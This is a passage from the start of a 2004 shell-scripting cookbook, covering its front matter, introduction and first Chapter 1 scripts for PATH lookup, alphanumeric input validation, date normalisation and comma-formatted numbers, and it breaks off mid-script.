
Wicked Cool Shell Scripts: 101 Scripts for Linux, Mac OS X, and Unix

Systems
by Dave Taylor

ISBN:1593270127

No Starch Press 2004


This cookbook of useful, customizable, and fun scripts gives you the tools to solve
common Linux, Mac OS X and UNIX problems and personalize your computing
environment.

Table of Contents
Wicked Cool Shell Scripts: 101 Scripts for Linux, Mac OS X, and Unix Systems
Introduction
Chapter 1 - The Missing Code Library
Chapter 2 - Improving on User Commands
Chapter 3 - Creating Utilities
Chapter 4 - Tweaking Unix
Chapter 5 - System Administration: Managing Users
Chapter 6 - System Administration: System Maintenance
Chapter 7 - Web and Internet Users
Chapter 8 - Webmaster Hacks
Chapter 9 - Web and Internet Administration
Chapter 10 - Internet Server Administration
Chapter 11 - Mac OS X Scripts
Chapter 12 - Shell Script Fun and Games
Afterword
Index
List of Figures
List of Tables

Back Cover
The UNIX shell is the main scripting environment of every Linux, Mac OS X and UNIX system,
whether a rescued laptop or a million-dollar mainframe. This cookbook of useful, customizable, and
fun scripts gives you the tools to solve common Linux, Mac OS X and UNIX problems and
personalize your computing environment. Among the more than 100 scripts included are an
interactive calculator, a spell checker, a disk backup utility, a weather tracker, and a web logfile
analysis tool. The book also teaches you how to write your own sophisticated shell scripts by
explaining the syntax and techniques used to build each example script. Examples are written in
Bourne Shell (sh) syntax.
About the Author
Dave Taylor has a Masters degree in Education, an MBA, and has written a dozen technical books,
including Learning UNIX for Mac OS X (O'Reilly), Solaris for Dummies (Hungry Minds), and Teach
Yourself UNIX in 24 Hours (SAMS). He was a contributor to BSD 4.4 UNIX, and his software is
included in many major UNIX distributions.

Wicked Cool Shell Scripts: 101 Scripts for Linux, Mac OS X, and Unix Systems
by Dave Taylor

San Francisco
Copyright 2004 by Dave Taylor.
All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means, electronic or
mechanical, including photocopying, recording, or by any information storage or retrieval system, without the prior
written permission of the copyright owner and the publisher.
Printed on recycled paper in the United States of America
1 2 3 4 5 6 7 8 9 10 - 06 05 04 03
No Starch Press and the No Starch Press logo are registered trademarks of No Starch Press, Inc. Other product and
company names mentioned herein may be the trademarks of their respective owners. Rather than use a trademark
symbol with every occurrence of a trademarked name, we are using the names only in an editorial fashion and to the
benefit of the trademark owner, with no intention of infringement of the trademark.
Publisher: William Pollock
Managing Editor: Karol Jurado
Cover and Interior Design: Octopod Studios
Technical Reviewer: Richard Blum
Copyeditor: Rebecca Pepper
Compositor: Wedobooks
Proofreader: Stephanie Provines
Indexer: Kevin Broccoli
Kevin & Kell strip on page 209 reproduced with permission of Bill Holbrook, creator of Kevin & Kell.
For information on translations or book distributors, please contact No Starch Press, Inc. directly:
No Starch Press, Inc.
555 De Haro Street, Suite 250, San Francisco, CA 94107
phone: 415-863-9900; fax: 415-863-9950; <info@nostarch.com>; http://www.nostarch.com
The information in this book is distributed on an "As Is" basis, without warranty. While every precaution has been
taken in the preparation of this work, neither the author nor No Starch Press, Inc. shall have any liability to any person
or entity with respect to any loss or damage caused or alleged to be caused directly or indirectly by the information
contained in it.
Library of Congress Cataloguing-in-Publication Data
Taylor, Dave.
Wicked cool shell scripts / Dave Taylor.
p. cm.

ISBN 1-59327-012-7
1. UNIX (Computer file) 2. UNIX Shells. I. Title.
QA76.76.O63T3895 2004
005.4'32--dc22
2003017496

Introduction
If you've used Unix for any length of time, you've probably found yourself starting to push the envelope, tweak how
things work, change the default flags for commands you use a lot, and even create rudimentary shell scripts that
automate simple tasks in a coherent fashion. Even if all you've done is to create an alias or two, you've taken the first
step on the road to being a shell script hacker extraordinaire, as you'll soon see.
I've been using Unix for more years than I want to think about, and it's a great OS, especially because I can tweak,
tune, and hack it. From simply automating common tasks to creating sophisticated, user-friendly versions of existing
Unix commands, and creating brand-new utilities that serve a useful purpose, I've been creating spiffo little shell scripts
for quite a while.
This book is about making Unix a friendlier, more powerful, and more personal computing environment by exploiting
the remarkable power and capabilities of the shell. Without writing a single line of C or C++, without invoking a single
compiler and loader, and without having to take any classes in program design and methodology, you'll learn to write
dozens of wicked cool shell scripts, ranging from an interactive calculator to a stock ticker monitor, and a set of scripts
that make analyzing Apache log files a breeze.

This Book Is for You If...


As with any technical book, an important question for Wicked Cool Shell Scripts is whether this book is for you. While
it's certainly not a primer on how to use the Unix, Linux, or Mac OS X shell to automate tasks, and it doesn't list all the
possible conditional tests that you can utilize with the test command, this book should nonetheless be engaging,
exciting, and stimulating for anyone who has ever delved into the murky world of shell scripting. If you want to learn
how to write a script, well, there are lots of great references online. But they all have one thing in common: They offer
dull, simple, and uninteresting examples. Instead, this book is intended to be a cookbook, a sort of "best of" hacks
compendium that shows the full and remarkable range of different tasks that can be accomplished with some savvy
shell script programming. With lengths ranging from a few dozen lines to a hundred or more, the scripts in this book
should not just prove useful, but will hopefully inspire you to experiment and create your own shell scripts too. And if
that sounds interesting, well, this book is definitely for you.

What Is a Shell Script, Anyway?


Time was (years ago) when hacking was considered a positive thing. Hackers were people on the cutting edge of
computer use, experimenting with and trying novel and unusual solutions to solve existing problems. These were people
who changed the way the rest of us looked at computers and computing.
But as the public network became more pervasive, a subset of these hackers started to migrate to remote system
break-in missions, with a zeal that rather overwhelmed the rest of us. Nowadays, many consider hacking a bad thing,
as in "hacking into the secure Department of Energy database." However, I like to think of hacking as being a more
benign, intellectually engaging, and considerably less criminal enterprise, more akin to the wonderful praise a computer
aficionado can offer with the compliment "Cool hack!"
This book is about cool shell script hacks.

Which Shell?
There are at least a dozen Unix shells floating around, but they're all based on two major flavors: Bourne Shell (sh)
and C Shell (csh). The most important shells in the Unix and Linux world are the Bourne Shell, C Shell, Korn Shell (a
descendant of the Bourne Shell), and Bourne Again Shell (bash).
The original command shell of note is the Bourne Shell, written by Stephen Bourne at AT&T Bell Labs in the early days
of Unix. It's probably still on your Unix box as /bin/sh, and while it's not sexy, and its syntax may be a bit odd, it's a
simple and powerful scripting environment so sufficiently common across Unixes that it's the lingua franca of the shell
scripting world.
The Free Software Foundation's open source reimplementation of the Bourne Shell goes by the name of bash, the
Bourne Again Shell. It is a lot more than just a reimplementation of a 20-year-old command shell, however; it's both a
great scripting environment and a highly capable interactive user shell. On many Linux systems, /bin/sh is actually
a hard link to bash.
And then there is the C Shell, UC Berkeley's most important innovation in the realm of shell script hacking. The C Shell
replaced the odd Bourne Shell syntax with a command syntax more like its namesake language, C.
As with many facets of Unix, passions are strong about which scripting environment is the best, with three predominant
camps: Bourne Shell, Korn Shell, and C Shell. But all is not equal. Consider the well-known article "Csh Programming
Considered Harmful"[1] whose author, Tom Christiansen, points out, quite correctly:
I am continually shocked and dismayed to see people write test cases, install scripts, and other
random hackery using the csh. Lack of proficiency in the Bourne shell has been known to cause
errors in /etc/rc and .cronrc files, which is a problem, because you must write these files in
that language.
The csh is seductive because the conditionals are more C-like, so the path of least resistance is
chosen and a csh script is written. Sadly, this is a lost cause, and the programmer seldom even
realizes it, even when they find that many simple things they wish to do range from cumbersome to
impossible in the csh.
I agree wholeheartedly with Tom, and hence in this book we will eschew the use of the C Shell. If you're a strong
advocate of the C Shell, well, you should find it easy to rewrite almost all of the scripts in this book to fit your shell.
Similarly, many people are advocates of the Korn Shell, which has a terrific interactive command line but, I feel, is less
capable as a scripting environment.
When evaluating a shell, consider both its interactive capabilities (such as aliases, command-line history, on-the-fly
spelling corrections, helpful error messages) and its scripting capabilities. This book focuses on the scripting side of
things, and so the scripts presented here will be Bourne Shell scripts (with an occasional sprinkling of bash or POSIX
shell tweaks for entertainment value) and should work just fine on any Unix you may have.

The Solaris Factor


If you're working on a Solaris system, you've got a bit of a problem, but not one that can't be solved. The scripts in this
book are all written against the POSIX 1003 standard for the Bourne Shell, which includes functions, variable slicing,
$() notation as a smarter alternative to backticks, and so on. So what's the problem? The default /bin/sh in
Solaris 9 and earlier is not POSIX-compliant, which causes a huge hassle.
Fortunately, you can fix it, in one of two ways:
1. Replace /bin/sh with a hard link to /usr/xpg4/bin/sh, the POSIX-compliant shell in Solaris.
This might be a bit radical, and there's a tiny chance it'll break other things in Solaris, so I'd be
cautious about this choice.
2. In every single script in this book, replace the #!/bin/sh first line with #!/usr/xpg4/bin/sh,
which is straightforward. This has the added advantage of allowing you to automate
the process with a for loop similar to the following:
# This assumes that you're in the Wicked Cool Shell Scripts script directory!
for script in *
do
  sed 's|#!/bin/sh|#!/usr/xpg4/bin/sh|' < $script > outfile
  mv outfile $script
done
Hopefully, with the release of Solaris 10, Sun will just say "ciao!" to the legacy problems and include a POSIX-compliant
version of the Bourne Shell as the default /bin/sh, and this will all go away as a problem.
[1] Online at http://www.faqs.org/faqs/unix-faq/shell/csh-whynot/

Organization of This Book


This book is organized into 12 chapters that reflect the wide range of different ways that shell scripts can improve and
streamline your use of Unix. If you're a Mac OS X fan, as I am, rest assured that almost every script in this book
will work just fine in both Jaguar and Panther, with the exception of those scripts that check the /etc/passwd file for
account information. (The user password information is in the NetInfo database instead. Visit the book's website for a
discussion of this issue and how to work with nireport and nidump instead.)

Chapter 1: The Missing Code Library


Programming languages in the Unix environment, particularly C and Perl, have extensive libraries of useful functions
and utilities to validate number formats, calculate date offsets, and perform many more useful tasks. When working with
the shell, you're left much more on your own, so this first chapter focuses on various tools and hacks to make shell
scripts more friendly, both throughout this book and within your own scripts. I've included various input validation
functions, a simple but powerful scriptable front end to bc, a tool for quickly adding commas to improve the
presentation of very large numbers, a technique for sidestepping Unixes that don't support the helpful -n flag to echo,
and an include script for using ANSI color sequences in scripts.

Chapters 2 and 3: Improving Commands and Creating Utilities


These two chapters feature new commands that extend and expand Unix in various helpful ways. Indeed, one
wonderful aspect of Unix is that it's always growing and evolving, as can be seen with the proliferation of command
shells. I'm just as guilty of aiding this evolution as the next hacker, so this pair of chapters offers scripts that implement
a friendly interactive calculator, an unremove facility, two different reminder/event-tracking systems, a reimplementation
of the locate command, a useful front end to the spelling facility, a multi-time-zone date command, and a new
version of ls that increases the usefulness of directory listings.

Chapter 4: Tweaking Unix


This may be heresy, but there are aspects of Unix that seem to be broken, even after decades of development. If you
move between different flavors of Unix, particularly between open source Linux distributions and commercial Unixes
like Solaris and HP-UX, you are aware of missing flags, missing commands, inconsistent commands, and similar
issues. Therefore, this chapter includes both rewrites and front ends to Unix commands to make them a bit friendlier or
more consistent with other Unixes. Scripts include a method of adding GNU-style full-word command flags to non-GNU
commands and a couple of smart scripts to make working with the various file-compression utilities considerably easier.

Chapters 5 and 6: System Administration Tools


If you've picked up this book, the odds are pretty good that you have both administrative access and administrative
responsibility on one or more Unix systems, even if it's just a personal Debian Linux or FreeBSD PC. (Which reminds
me of a joke: How do you fix a broken Windows PC? Install Linux!) These two chapters offer quite a few scripts to
improve your life as an admin, including disk usage analysis tools, a disk quota system that automatically emails users
who are over their quota, a tool that summarizes which services are enabled regardless of whether you use inetd or
xinetd, a killall reimplementation, a crontab validator, a log file rotation tool, and a couple of backup
utilities.

Chapter 7: Web and Internet Users


If you've got a computer, you've also doubtless got an Internet connection. This chapter includes a bunch of really cool
shell script hacks that show how the Unix command line can offer some wonderful and quite simple methods of
working with the Internet, including a tool for extracting URLs from any web page on the Net, a weather tracker, a
movie database search tool, a stock portfolio tracker, and a website change tracker with automatic email notification
when changes appear.

Chapter 8: Webmaster Hacks


The other side of the web coin, of course, is when you run a website, either from your own Unix system or on a shared
server elsewhere on the network. If you're a webmaster or an ISP, the scripts in this chapter offer quite interesting tools
for building web pages on the fly, processing contact forms, building a web-based photo album, and even the ability to
log web searches. This chapter also includes a text counter and complete guest book implementation, all as shell
scripts.

Chapters 9 and 10: Web and Internet Administration

These two chapters consider the challenges facing the administrator of an Internet server, including two different scripts
to analyze different aspects of a web server traffic log, tools for identifying broken internal or external links across a
website, a web page spell-check script, and a slick Apache web password management tool that makes keeping an
.htaccess file accurate a breeze. Techniques for mirroring directories and entire websites with mirroring tools are
also explored.

Chapter 11: Mac OS X Scripts


The Macintosh operating system is a tremendous leap forward in the integration of Unix and an attractive, commercially
successful graphical user interface. More importantly, because every Mac OS X system includes a complete Unix
hidden behind the pretty interface, there are a number of useful and educational scripts that can be written, and that's
what this chapter explores. In addition to a rewrite of adduser, allowing new Mac OS X user accounts to be set up
in seconds from the command line, scripts in this chapter explore how Macs handle email aliases, how iTunes stores its
music library, and how to change Terminal window titles and improve the useful open program.

Chapter 12: Fun and Games


What's a programming book without at least a few games? This last chapter integrates many of the most sophisticated
techniques and ideas in the book to present three fun and challenging games. While entertaining, the code for each is
also well worth studying as you read through this last chapter. Of special note is the hangman game, which shows off
some smart coding techniques and shell script tricks.

The Website
The official website for this book can be found at http://www.intuitive.com/wicked/
You'll find all the scripts discussed in this book as well as several bonus scripts, including games, some Mac OS X-specific hacks, and others that didn't make the final cut for the book, but which are still worth examination and study.
You'll also find a link to the official errata list for this book (worth checking especially if you're finding that a script isn't
working for you) and information about the many other books I've written on Unix and web-related topics.

Acknowledgments
A remarkable number of people have contributed to the creation and development of this book, most notably Dee-Ann
LeBlanc, my first-generation tech reviewer and perpetual IM buddy, and Richard Blum, tech editor and scripting expert,
who offered significant and important commentary regarding the majority of the scripts in the book. Nat Torkington
helped with the organization and robustness of the scripts. Others who offered invaluable assistance during the
development phase include Andrey Bronfin, Martin Brown, Brian Day, Dave Ennis, Werner Klauser, Eugene Lee, Andy
Lester, and John Meister. The MacOSX.com forums have been helpful (and are a cool place to hang out online), and
the AnswerSquad.com team has offered great wisdom and infinite opportunities for procrastination. Finally, this book
wouldn't be in your hands without the wonderful support of Bill Pollock and stylistic ministrations of Hillel Heinstein,
Rebecca Pepper, and Karol Jurado: Thanks to the entire No Starch team!
I'd like to acknowledge the support of my family, Linda, Ashley, and Gareth. Though there's always something going on
and someone wanting to play, somehow they've given me enough room to develop a tremendous number of scripts
and write a book about it all. Amazing!

Finally ...
I hope you enjoy this book, find the scripts useful and interesting, and perhaps get more of a sense of the power and
sophistication of the shell programming environment along the way, which is certainly more powerful and capable than
most people realize. And fun. Did I mention that writing shell scripts is great fun? :-)
Dave Taylor
<taylor@intuitive.com>
http://www.intuitive.com/
P.S. Please don't forget to check out AnswerSquad (http://www.answersquad.com/) the next time you're
online. Staffed by dozens of computer experts for whom wicked cool is all in a day's work, it's unquestionably your best
option for computer technical support regardless of platform or software. I should know: I'm part of the team!

Chapter 1: The Missing Code Library


Overview
Unix's greatest strength is that it lets you create new commands by combining old ones in unique and novel ways.
However, although Unix includes hundreds of commands and there are thousands of ways to combine them, you will
still encounter situations in which nothing does the job quite right. This chapter focuses on scripts that allow you to
create smarter and more sophisticated programs within the constraints of shell scripts.
There's a secret that we should address up front: The shell script programming environment isn't as sophisticated as a
real programming environment. Perl, Python, and even C have structures and libraries that offer extended capabilities,
but shell scripts are more of a "roll your own" world. The scripts in this chapter will help you make your way in that
world. They'll serve as a set of tools that will let us write better, smarter, more sophisticated scripts later in the book.
Much of the challenge of script writing arises from the subtle variations between different flavors of Unix. While the IEEE
POSIX standards supposedly provide a common base of functionality across different Unix implementations, it can still
be confusing to use a Solaris system after a year in a Red Hat Linux environment. The commands are different, they're
in different locations, and they often have subtly different command flags. These variations can make writing shell
scripts difficult too, as you may imagine.

What Is POSIX?
The early days of Unix were like the mythical Wild West, with companies innovating and taking the operating system in
quite different directions while simultaneously assuring customers that the new operating systems were compatible and
just like the other Unixes. The Institute of Electrical and Electronics Engineers (IEEE) stepped in and, with a
tremendous amount of effort from all the major Unix vendors, created a standard version of Unix called POSIX, against
which all the commercial and open source Unix implementations are measured. You can't buy a POSIX operating
system per se, but the Unix or Linux you run is POSIX compliant.
Yet even POSIX-compliant Unix implementations can vary. One example of this that will be addressed later in this
chapter involves the echo command. Some versions of this command support an -n flag, which disables the trailing
newline that's a standard part of the command execution. Other versions of echo support the \c escape sequence as
a special "don't include a newline" notation, while still others ignore it all and have no apparent way to avoid newlines.
To make things even more puzzling, some command shells have a built-in echo function that ignores the -n and \c
flags, while the same Unix system usually also has a stand-alone binary /bin/echo that understands these flags.
This makes prompting for input in a shell script quite tough, because ideally the script should work identically on as
many Unix systems as possible. For functional scripts, needless to say, it's critical to normalize the echo command,
and that's just one of the many scripts included in this book.
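One way to probe this difference at runtime can be sketched in a few lines. This is a minimal illustration, not the book's actual normalization script, and the echon helper name is made up for the example:

```shell
# If echo understands -n, 'echo -n hi' prints "hi"; if it doesn't,
# it prints the literal string "-n hi". Test which behavior we have
# and define a portable echon() accordingly.
if [ "$(echo -n hi)" = "hi" ] ; then
  echon() { echo -n "$*" ; }     # the -n flag is honored
else
  echon() { echo "$*\c" ; }      # fall back to the \c notation
fi

echon "Enter input: "
```

Either branch leaves you with one function that suppresses the trailing newline on that particular system, which is the essence of the normalization problem described above.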
Let's get started looking at actual scripts to include in our shell script library.

#1 Finding Programs in the PATH


Shell scripts that use environment variables (like MAILER and PAGER) have a hidden danger: Some of their settings
may well point to nonexistent programs. For example, if you decide to be flexible by using the PAGER setting to
display script output, instead of just hard-coding a specific tool, how do you ensure that the PAGER value is set to a
valid program? After all, if it's not a valid program, your script will break. This first script addresses how to test whether
a given program can be found in the user's PATH, and it's also a good demonstration of a number of different shell
scripting techniques, including script functions and variable slicing.

The Code
#!/bin/sh
# inpath - Verifies that a specified program is either valid as is,
#   or that it can be found in the PATH directory list.

in_path()
{
  # Given a command and the PATH, try to find the command. Returns
  # 0 if found and executable, 1 if not. Note that this temporarily
  # modifies the IFS (input field separator) but restores it upon completion.

  cmd=$1
  path=$2
  retval=1
  oldIFS=$IFS
  IFS=":"

  for directory in $path
  do
    if [ -x $directory/$cmd ] ; then
      retval=0      # if we're here, we found $cmd in $directory
    fi
  done

  IFS=$oldIFS
  return $retval
}

checkForCmdInPath()
{
  var=$1

  # The variable slicing notation in the following conditional
  # needs some explanation: ${var#expr} returns everything after
  # the match for 'expr' in the variable value (if any), and
  # ${var%expr} returns everything that doesn't match (in this
  # case, just the very first character). You can also do this in
  # Bash with ${var:0:1}, and you could use cut too: cut -c1.

  if [ "$var" != "" ] ; then
    if [ "${var%${var#?}}" = "/" ] ; then
      if [ ! -x $var ] ; then
        return 1
      fi
    elif ! in_path $var $PATH ; then
      return 2
    fi
  fi
}

Where to put your scripts

I recommend that you create a new directory called "scripts,"
probably as a part of your HOME directory, and then add that fully
qualified directory name to your PATH variable. (Use echo
$PATH to see your current PATH, and edit the contents of your
.login or .profile (depending on the shell) to modify your PATH
appropriately.)
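For instance, the addition to your .profile might look like the two lines below. This is just a sketch, and the directory name is only an example:

```shell
# Hypothetical ~/.profile fragment: append a personal scripts
# directory to the search path, then export the updated PATH.
PATH="$PATH:$HOME/scripts"
export PATH
```

After logging in again (or sourcing the file), any script dropped into that directory can be invoked by name from anywhere.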

Running the Script


To run this script, we first need to append a short block of commands to the very end of the file. These commands
pass a starting parameter to the validation program and check the return code, like so:
if [ $# -ne 1 ] ; then
  echo "Usage: $0 command" >&2 ; exit 1
fi

checkForCmdInPath "$1"
case $? in
  0 ) echo "$1 found in PATH"                ;;
  1 ) echo "$1 not found or not executable"  ;;
  2 ) echo "$1 not found in PATH"            ;;
esac

exit 0
Once you've added the additional code snippet, you can invoke this script directly, as shown in "The Results," next.
Make sure to remove or comment out the additional code before you're done with this script, however, so its later
inclusion as a library function doesn't mess things up.

The Results
To test the script, let's invoke inpath with the names of three programs: a program that exists, a program that exists
but isn't in the PATH, and a program that does not exist but that has a fully qualified filename and path:
$ inpath echo
echo found in PATH
$ inpath MrEcho
MrEcho not found in PATH
$ inpath /usr/bin/MrEcho
/usr/bin/MrEcho not found or not executable

Hacking the Script


Perhaps the most unusual aspect of this code is that it uses the POSIX variable slicing method of ${var%${var#?}}. To understand this notation, realize that the apparent gobbledygook is really two nested string slices. The inner
call, ${var#?}, extracts everything but the first character of the variable var (? is a pattern that
matches any single character). Next, the call ${var%pattern} produces a substring with everything left over once the
specified pattern is applied to the inner call. In this case, what's left is the first character of the string.
This is a pretty dense explanation, admittedly, but the key to getting checkForCmdInPath to work is for it to be
able to differentiate between variables that contain just the program name (like echo) and variables that contain a full
directory path plus the filename (like "/bin/echo"). It does this by examining the very first character of the given
value to see if it's a "/" or not; hence the need to isolate the first character from the rest of the variable value.
If this POSIX notation is too funky for you, Bash and Ksh support another method of variable slicing. The substring
function ${varname:start:size} requests a certain number of characters from varname specified by size
and beginning with the character position in varname specified by start. For example, ${varname:0:1} would
produce a substring consisting of just the first character of varname. Of course, if you don't like either of these
techniques for extracting just the first character, you can also use a system call: $(echo $var | cut -c1).
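The nested slices are easy to try interactively. The short session below is a quick illustration on a sample value, not part of the book's script:

```shell
# Demonstrate each layer of the nested slicing on a sample value.
var="/bin/echo"

echo "${var#?}"          # everything after the first character: bin/echo
echo "${var%${var#?}}"   # everything except that remainder: /
echo "${var:0:1}"        # the Bash/Ksh substring equivalent: /
```

Running each expansion separately like this makes it clear that the outer % slice simply discards what the inner # slice kept.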
Note Script #47 in the Administrative Tools chapter is a useful script that's closely related to this one. It validates
both the directories in the PATH and the environment variables in the user's login environment.

#2 Validating Input: Alphanumeric Only


Users are constantly ignoring directions and entering data that's inconsistent or incorrectly formatted, or that uses
incorrect syntax. As a shell script developer, you need to intercept and correct these errors before they become
problems.
A typical situation you may encounter in this regard involves filenames or database keys. You prompt the user for a
string that's supposed to be made up exclusively of uppercase characters, lowercase characters, and digits. No
punctuation, no special characters, no spaces. Did they enter a valid string or not? That's what this script tests.

The Code
#!/bin/sh
# validAlphaNum - Ensures that input consists only of alphabetical
#   and numeric characters.

validAlphaNum()
{
  # Validate arg: returns 0 if all upper+lower+digits, 1 otherwise

  # Remove all unacceptable chars
  compressed="$(echo $1 | sed -e 's/[^[:alnum:]]//g')"

  if [ "$compressed" != "$1" ] ; then
    return 1
  else
    return 0
  fi
}

# Sample usage of this function in a script

echo -n "Enter input: "
read input

if ! validAlphaNum "$input" ; then
  echo "Your input must consist of only letters and numbers." >&2
  exit 1
else
  echo "Input is valid."
fi

exit 0

How It Works
The logic of this script is straightforward. First, it transforms the input with a sed-based transform to create a new
version of the input data, and then it compares the new version with the original. If the two versions are the same, all is
well. If not, the transform lost data that wasn't part of the acceptable alphanumeric (alphabetic plus numeric) character
set, and the input was unacceptable.
Specifically, the sed substitution removes any characters not in the set [:alnum:], the POSIX shorthand for the local
definition of all upper- and lowercase characters and digits (alnum stands for alphanumeric). If this new, compressed
value doesn't match the input entered earlier, then stripping the nonalphanumeric characters changed the string, meaning the input
contained illegal characters, and the function returns a nonzero result, indicating a problem.

Running the Script


This particular script is self-contained. It prompts for input and then informs you whether the result is valid or not. A
more typical use of this function, however, would be to include it at the top of another shell script or in a library, as
shown in Script #12, Building a Shell Script Library.
This script is a good example of a general shell script programming technique. Write your functions and then test them
before you integrate them into larger, more complex scripts. It'll save lots of headaches.
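As a minimal illustration of that workflow (a hypothetical stripped-down variant of validAlphaNum, not the book's full script), you can keep a couple of throwaway test calls at the bottom of the file and delete them once the function graduates into a library:

```shell
#!/bin/sh

# Stripped-down validation function, kept simple for testing purposes
validAlphaNum()
{
   # Succeeds (returns 0) only if removing non-alphanumerics changes nothing
   compressed="$(echo $1 | sed -e 's/[^[:alnum:]]//g')"
   [ "$compressed" = "$1" ]
}

# Throwaway tests: delete these lines once the function moves into a library
if validAlphaNum "good123" ; then
   echo "test 1 passed"
fi
if ! validAlphaNum "bad value!" ; then
   echo "test 2 passed"
fi
```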

The Results
$ validalnum
Enter input: valid123SAMPLE
Input is valid.
$ validalnum
Enter input: this is most assuredly NOT valid, 12345
Your input must consist of only letters and numbers.

Hacking the Script


This "remove the good characters and then see what's left" approach is nice because it's tremendously flexible. Want to
force uppercase letters but also allow spaces, commas, and periods? Simply change the substitution pattern:
sed 's/[^[:upper:] ,.]//g'
A simple test for valid phone number input (allowing integer values, spaces, parentheses, and dashes) could be
sed 's/[^[:digit:]() -]//g'
To force integer values only, though, beware of a pitfall. You might try the following:
sed 's/[^[:digit:]]//g'
But what if you want to permit entry of negative numbers? If you just add the minus sign to the valid character set, a string like 3-4 would pass the test, though it's clearly not a legal integer. The particular issue of handling negative numbers is
addressed in Script #5, Validating Integer Input, later in this chapter.
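To see these patterns in action on a couple of made-up sample strings (the inputs here are illustrative, not from the book):

```shell
# Uppercase letters, spaces, commas, and periods survive; all else is removed
echo 'ABC, DEF!' | sed 's/[^[:upper:] ,.]//g'             # → ABC, DEF

# Digits, spaces, parentheses, and dashes survive, phone-number style
echo '(303) 555-1212 x45' | sed 's/[^[:digit:]() -]//g'   # → (303) 555-1212 45
```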

#3 Normalizing Date Formats


One problematic issue with shell script development is the number of inconsistent data formats; normalizing them can
range from tricky to quite difficult. Date formats are some of the most challenging to work with because a date can be
specified in several different ways. Even if you prompt for a specific format, like "month day year," you're likely to be
given inconsistent input: a month number instead of a month name, an abbreviation for a month name, or a full name in
all uppercase letters.
For this reason, a function that normalizes dates, though rudimentary on its own, will prove to be a very helpful building
block for subsequent script work, especially Script #7, Validating Date Formats.

The Code
#!/bin/sh

# normdate -- Normalizes month field in date specification
#   to three letters, first letter capitalized. A helper
#   function for Script #7, valid-date. Exits w/ zero if no error.

monthnoToName()
{
   # Sets the variable 'month' to the appropriate value
   case $1 in
      1 ) month="Jan"    ;;
      2 ) month="Feb"    ;;
      3 ) month="Mar"    ;;
      4 ) month="Apr"    ;;
      5 ) month="May"    ;;
      6 ) month="Jun"    ;;
      7 ) month="Jul"    ;;
      8 ) month="Aug"    ;;
      9 ) month="Sep"    ;;
      10) month="Oct"    ;;
      11) month="Nov"    ;;
      12) month="Dec"    ;;
      * ) echo "$0: Unknown numeric month value $1" >&2; exit 1
   esac
   return 0
}

## Begin main script

if [ $# -ne 3 ] ; then
   echo "Usage: $0 month day year" >&2
   echo "Typical input formats are August 3 1962 and 8 3 2002" >&2
   exit 1
fi

if [ $3 -lt 99 ] ; then
   echo "$0: expected four-digit year value." >&2; exit 1
fi

if [ -z "$(echo $1|sed 's/[[:digit:]]//g')" ] ; then
   monthnoToName $1
else
   # Normalize to first three letters, first upper, rest lowercase
   month="$(echo $1|cut -c1|tr '[:lower:]' '[:upper:]')"
   month="$month$(echo $1|cut -c2-3|tr '[:upper:]' '[:lower:]')"
fi

echo $month $2 $3

exit 0

How It Works
Notice the third conditional in this script:
if [ -z "$(echo $1|sed 's/[[:digit:]]//g')" ] ; then
It strips out all the digits and then uses the -z test to see whether the result is blank. If the result is blank, the first
input field must be a digit or digits, so it's mapped to a month name with a call to monthnoToName. Otherwise, a
complex sequence of cut and tr pipes follows to build the value of month by having two subshell-escaped
sequences (that is, sequences surrounded by $( and ) so that the enclosed command is invoked and its output
substituted). The first of the sequences shown here extracts just the first character and forces it to uppercase with tr.
(The sequence echo $1|cut -c1 could also be written as ${1%${1#?}} in the POSIX manner, as seen
earlier.) The second of the sequences extracts the second and third characters and forces them to be lowercase:
month="$(echo $1|cut -c1|tr '[:lower:]' '[:upper:]')"
month="$month$(echo $1|cut -c2-3|tr '[:upper:]' '[:lower:]')"
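That parenthetical deserves a quick unpacking. ${1#?} strips the first character from $1, and ${1%${1#?}} then strips that remainder off the end, leaving only the first character, with no pipes or subshells. A small sketch (the word "august" is just an arbitrary sample):

```shell
set -- "august"

rest="${1#?}"           # strip the first character: "ugust"
first="${1%${1#?}}"     # strip "ugust" off the end: "a"

echo "$first / $rest"   # → a / ugust
```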

Running the Script


To ensure maximum flexibility with future scripts that incorporate the normdate functionality, this script was designed
to accept input as three fields entered on the command line. If you expected to use this script only interactively, by
contrast, you'd prompt the user for the three fields, though that would make it more difficult to invoke normdate from
other scripts.

The Results
This script does what we hoped, normalizing date formats as long as the format meets a relatively simple set of criteria
(month name known, month value between 1 and 12, and a four-digit year value). For example,
$ normdate 8 3 62
normdate: expected four-digit year value.
$ normdate 8 3 1962
Aug 3 1962
$ normdate AUGUST 3 1962
Aug 3 1962

Hacking the Script


Before you get too excited about the many extensions you can add to this script to make it more sophisticated, check
out Script #7, which uses normdate to validate input dates. One modification you could make, however, would be to
allow the script to accept dates in the format MM/DD/YYYY or MM-DD-YYYY by adding the following snippet
immediately before the test to see if three arguments are specified:
if [ $# -eq 1 ] ; then   # try to compensate for / or - formats
   set -- $(echo $1 | sed 's/[\/\-]/ /g')
fi
With this modification, you could also enter the following common formats and normalize them too:
$ normdate March-11-1911
Mar 11 1911
$ normdate 8/3/1962
Aug 3 1962

#4 Presenting Large Numbers Attractively


A common mistake that programmers make is to present the results of calculations to the user without first formatting
them. It's difficult for users to ascertain whether 43245435 goes into the millions without manually counting from right to
left and mentally inserting a comma every three digits. Use this script to format your results.

The Code
#!/bin/sh

# nicenumber -- Given a number, shows it in comma-separated form.
#   Expects DD and TD to be instantiated. Instantiates nicenum
#   or, if a second arg is specified, the output is echoed to stdout.

nicenumber()
{
   # Note that we assume that '.' is the decimal separator in
   #   the INPUT value to this script. The decimal separator in the
   #   output value is '.' unless specified by the user with the -d flag.

   integer=$(echo $1 | cut -d. -f1)      # left of the decimal
   decimal=$(echo $1 | cut -d. -f2)      # right of the decimal

   if [ "$decimal" != "$1" ]; then
      # There's a fractional part, so let's include it.
      result="${DD:="."}$decimal"
   fi

   thousands=$integer

   while [ $thousands -gt 999 ] ; do
      remainder=$(($thousands % 1000))   # three least significant digits

      while [ ${#remainder} -lt 3 ] ; do # force leading zeros as needed
         remainder="0$remainder"
      done

      thousands=$(($thousands / 1000))   # to left of remainder, if any
      result="${TD:=","}${remainder}${result}"    # builds right to left
   done

   nicenum="${thousands}${result}"

   if [ ! -z "$2" ] ; then
      echo $nicenum
   fi
}

DD="."    # decimal point delimiter, to separate integer and fractional values
TD=","    # thousands delimiter, to separate every three digits

while getopts "d:t:" opt; do
   case $opt in
      d ) DD="$OPTARG"   ;;
      t ) TD="$OPTARG"   ;;
   esac
done
shift $(($OPTIND - 1))

if [ $# -eq 0 ] ; then
